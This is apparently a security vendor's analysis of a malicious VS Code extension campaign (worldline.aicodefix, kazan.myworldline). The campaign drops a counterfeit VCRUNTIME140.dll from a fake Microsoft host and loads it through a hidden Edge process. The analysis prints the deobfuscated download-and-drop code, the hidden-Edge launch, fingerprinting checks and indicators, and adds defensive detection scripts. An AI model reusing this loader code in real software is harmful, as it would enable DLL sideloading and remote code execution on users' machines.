Native code is the hardest layer of a VS Code extension to automatically audit. The worldline.aicodefix campaign exploited this by dressing its payload as a Microsoft Visual C++ runtime DLL and delivering it through a fake Microsoft service domain.

Executive Summary

  • Extensions: worldline.aicodefix-0.0.1, kazan.myworldline-0.0.1
  • Behavior: Downloads a counterfeit VCRUNTIME140.dll from msdn-service[.]com, writes it to a fake Microsoft\Edge\User Data\Domain Actions\3.0.0.18 directory, launches a hidden msedge.exe process, then kills it
  • Environment check: First three characters of USERDOMAIN must hash to a42403182a41381c625671f9a1c6132625efb355bd9255d22607e7392322fc23, and C:\Program Files (x86)\FastTrack Software\Admin By Request\AdminByRequest.exe must exist
  • Risk score: Up to 96
  • Campaign status: 2 seed samples; retro-hunt isolated

Technical Analysis

A Visual C++ runtime DLL is part of the invisible plumbing on every Windows machine. Most users and many scanners assume that VCRUNTIME140.dll is Microsoft code. The operator abuses that assumption by downloading a custom DLL with the same name and placing it in a directory tree that looks like a legitimate Edge profile: %LOCALAPPDATA%\Microsoft\Edge\User Data\Domain Actions\3.0.0.18\VCRUNTIME140.dll.

The delivery is split across three pieces:

  1. A benign-looking VS Code extension (AI Code Fix - WL, VS Code Update) that runs proprietary/startuplogic.js on activation.
  2. A fake Microsoft host msdn-service.com that serves the payload as assets/ico.bmp.
  3. A hidden msedge.exe window that loads the dropped DLL from the spoofed user-data directory.

By the time anyone notices, the payload is already on disk in a Microsoft-shaped path.

Startup and Anti-Analysis

Both variants ship a dist/proprietary/startuplogic.js file that is obfuscated with a custom string decoder. The worldline and kazan files are functionally identical; only the obfuscator variable names differ. The extension’s main entry point simply imports and runs it:

const { runStartupLogic } = require('./proprietary/startupLogic');
runStartupLogic();

Before fetching any additional data, the sample performs an environment check to validate the machine. It checks that process.env.USERDOMAIN is not null and that the SHA-256 of its first three characters equals:

a42403182a41381c625671f9a1c6132625efb355bd9255d22607e7392322fc23

It also verifies that the following file exists:

C:\Program Files (x86)\FastTrack Software\Admin By Request\AdminByRequest.exe

These checks make the extension a targeted implant rather than a scattershot dropper. It only activates in environments that look like the intended victim.

Payload Download

If the environment check passes, the script builds a target path under the user’s local AppData:

const PAYLOAD_URL = 'hxxps://msdn-service[.]com/assets/ico.bmp';
const PAYLOAD_NAME = 'VCRUNTIME140.dll';
const TARGET_DIR = path.join(
  process.env.LOCALAPPDATA,
  'Microsoft',
  'Edge',
  'User Data',
  'Domain Actions',
  '3.0.0.18'
);
const TARGET_FILE = path.join(TARGET_DIR, PAYLOAD_NAME);

It downloads ico.bmp with rejectUnauthorized: false (so the TLS certificate of the counterfeit host is never validated), writes it to TARGET_FILE.tmp, then renames it to VCRUNTIME140.dll:

fs.mkdirSync(TARGET_DIR, { recursive: true });
https.get(PAYLOAD_URL, GET_OPTS, (res) => {
  const chunks = [];
  res.on('data', c => chunks.push(c));
  res.on('end', () => {
    const tmpFile = TARGET_FILE + '.tmp';
    fs.writeFileSync(tmpFile, Buffer.concat(chunks));
    fs.renameSync(tmpFile, TARGET_FILE);
  });
});

The .bmp extension is a content disguise; the file on disk is a DLL with a Microsoft runtime name.
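One way a proxy or endpoint tool can catch this disguise is to classify the downloaded blob by its magic bytes instead of trusting the served name. This is an added example, not code from the campaign or from Argus; the BMP and PE byte strings are constructed inline (the PE is a bare DOS header plus a "PE\0\0" signature, not the real payload).

```python
import struct

# Constructed sample inputs (not taken from the campaign's real payload):
# a real bitmap header, and a minimal PE image whose DOS header points at a
# "PE\0\0" signature, which is the shape a counterfeit VCRUNTIME140.dll has.
BMP_SAMPLE = b"BM" + b"\x00" * 60
PE_SAMPLE = bytearray(b"MZ" + b"\x00" * 0x3E)        # DOS header is 0x40 bytes
struct.pack_into("<I", PE_SAMPLE, 0x3C, 0x80)        # e_lfanew -> offset 0x80
PE_SAMPLE += b"\x00" * (0x80 - len(PE_SAMPLE))
PE_SAMPLE += b"PE\0\0" + struct.pack("<H", 0x8664)   # signature + Machine (x64)
PE_SAMPLE = bytes(PE_SAMPLE)

IMAGE_EXTS = {"bmp", "png", "jpg", "jpeg", "gif", "ico"}


def sniff_type(data: bytes) -> str:
    """Classify a blob by its magic bytes, ignoring the name it was served under."""
    if data[:2] == b"BM":
        return "bmp"
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
            return "pe"
        return "mz-stub"        # DOS header without a PE signature
    return "unknown"


def masquerade_verdict(served_name: str, data: bytes) -> dict:
    """Compare the claimed extension with the sniffed content.

    A PE image delivered under an image-file name (ico.bmp) is exactly the
    content disguise the worldline dropper relies on.
    """
    ext = served_name.rsplit(".", 1)[-1].lower() if "." in served_name else ""
    actual = sniff_type(data)
    return {
        "claimed": ext,
        "actual": actual,
        "suspicious": actual == "pe" and ext in IMAGE_EXTS,
    }
```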

DLL Loading via Edge

After the drop, the script launches Microsoft Edge off-screen and points it at the fake user-data directory:

const EDGE_PATH = 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe';
const child = child_process.spawn(EDGE_PATH, [
  '--window-position=-32000,-32000',
  '--window-size=1,1'
], {
  detached: true,
  stdio: 'ignore',
  windowsHide: true
});
child.unref();

The --window-position=-32000,-32000 and --window-size=1,1 flags keep the browser invisible. After a delay, it kills the spawned process with taskkill /IM msedge.exe. The purpose of the Edge launch is to load the counterfeit VCRUNTIME140.dll from the attacker-controlled directory and execute its exported code inside a trusted Microsoft process.

Why it evades detection

Defender assumption                                          | What the sample actually does
-------------------------------------------------------------|--------------------------------------------------------------------
msdn-service.com is a Microsoft domain                       | It is a counterfeit host serving a DLL disguised as ico.bmp
VCRUNTIME140.dll is a trusted system file                    | This one is downloaded and dropped by the extension
%LOCALAPPDATA%\Microsoft\Edge\User Data is normal            | The path is forged; Domain Actions\3.0.0.18 is attacker-controlled
msedge.exe spawning from an extension is unusual but harmless | It is used to load the fake DLL invisibly
The extension has no malicious strings                       | The URL and command line are built at runtime from obfuscated arrays

What we are doing about it

Argus detects this family through behavioral signals rather than relying on a static rule:

  • hxxps://msdn-service[.]com or similar counterfeit Microsoft service domains
  • Extensions that write VCRUNTIME140.dll or other runtime-named files under %LOCALAPPDATA%\Microsoft\Edge\User Data
  • msedge.exe spawned with hidden-window flags from an extension process
  • process.env.USERDOMAIN fingerprinting and file-existence checks for AdminByRequest.exe
  • the worldline / kazan publisher pair

Retro-hunting the local corpus found no additional matches, so this is a small campaign, but the technique is easy to copy.

Remediation and recommendations

  1. Remove worldline.aicodefix and kazan.myworldline from all installs.
  2. Block msdn-service.com and assets/ico.bmp at the network layer.
  3. Alert on extensions writing DLLs into %LOCALAPPDATA%\Microsoft\Edge\User Data or subdirectories that do not belong to a real Edge profile.
  4. Monitor msedge.exe launches with --window-position=-32000,-32000 or --window-size=1,1 from non-browser parent processes.
  5. Treat USERDOMAIN fingerprinting and checks for AdminByRequest.exe as targeted-implant behavior.
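Recommendations 3 and 4 translate directly into telemetry rules. The following is an added example, not Argus code: it evaluates three rules over constructed process-creation and file-creation events in a Sysmon-like shape (field names Image, ParentImage, CommandLine, TargetFilename are assumptions about the log source; the sample events, including the Code.exe parent path, are made up).

```python
import re
from typing import Iterable

# Flags the sample passes to msedge.exe to keep the window off-screen.
HIDDEN_EDGE_FLAGS = ("--window-position=-32000,-32000", "--window-size=1,1")
# Parents that legitimately start Edge (assumed allow-list); anything else is a non-browser parent.
BROWSER_PARENTS = {"msedge.exe", "explorer.exe", "svchost.exe"}
EDGE_USER_DATA = "\\microsoft\\edge\\user data\\"

# Constructed events (not real telemetry from the campaign).
SAMPLE_EVENTS = [
    {"Id": "1", "EventType": "ProcessCreate", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": '"msedge.exe" --profile-directory=Default'},
    {"Id": "2", "EventType": "FileCreate",
     "Image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "TargetFilename": r"C:\Users\dev\AppData\Local\Microsoft\Edge\User Data\Domain Actions\3.0.0.18\VCRUNTIME140.dll"},
    {"Id": "3", "EventType": "ProcessCreate",
     "ParentImage": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": '"msedge.exe" --window-position=-32000,-32000 --window-size=1,1'},
    {"Id": "4", "EventType": "ProcessCreate",
     "ParentImage": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\taskkill.exe", "CommandLine": "taskkill /IM msedge.exe"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: dict) -> list:
    """Return the names of every rule the event trips (empty list if benign)."""
    hits = []
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "").lower()
    if ev["EventType"] == "ProcessCreate":
        # Rule 4: off-screen Edge started by something that is not a browser.
        if image == "msedge.exe" and parent not in BROWSER_PARENTS and any(f in cmd for f in HIDDEN_EDGE_FLAGS):
            hits.append("hidden_edge_from_non_browser")
        # The sample's cleanup step: taskkill against Edge by image name.
        if image == "taskkill.exe" and re.search(r"/im\s+msedge\.exe", cmd):
            hits.append("edge_cleanup_taskkill")
    elif ev["EventType"] == "FileCreate":
        # Rule 3: a DLL written under Edge's User Data by a process other than Edge.
        target = ev.get("TargetFilename", "").lower()
        if EDGE_USER_DATA in target and target.endswith(".dll") and image != "msedge.exe":
            hits.append("dll_written_under_edge_user_data")
    return hits


def scan(events: Iterable[dict]) -> dict:
    """Map each rule name to the ids of the events that tripped it."""
    out = {}
    for ev in events:
        for rule in classify(ev):
            out.setdefault(rule, []).append(ev["Id"])
    return out
```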

Indicators

Type                      | Value
--------------------------|-------------------------------------------------------------------------------
Extensions                | worldline.aicodefix-0.0.1, kazan.myworldline-0.0.1
VSIX SHA-256 (worldline)  | c3551ba266b56b5b5355ee27ad626877d19184112c0d23123f230b749d87e94b
VSIX SHA-256 (kazan)      | 7c49a622e73361fcebefc18ec1990ace93ca7dd776be66a263ae51db05bae06d
Fake service              | hxxps://msdn-service[.]com/assets/ico.bmp
Fake DLL name             | VCRUNTIME140.dll
Drop path                 | %LOCALAPPDATA%\Microsoft\Edge\User Data\Domain Actions\3.0.0.18\VCRUNTIME140.dll
Target executable         | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Edge launch flags         | --window-position=-32000,-32000, --window-size=1,1
Cleanup command           | taskkill /IM msedge.exe
Expected parent file      | C:\Program Files (x86)\FastTrack Software\Admin By Request\AdminByRequest.exe
USERDOMAIN hash           | a42403182a41381c625671f9a1c6132625efb355bd9255d22607e7392322fc23
Detection focus           | Fake-MSDN DLL + hidden Edge loader + targeted env fingerprinting

The worldline campaign shows that the native layer of a VS Code extension is still a blind spot. A counterfeit DLL with a plausible name, a fake Microsoft host, and a hidden browser process is enough to run arbitrary code outside the JavaScript sandbox.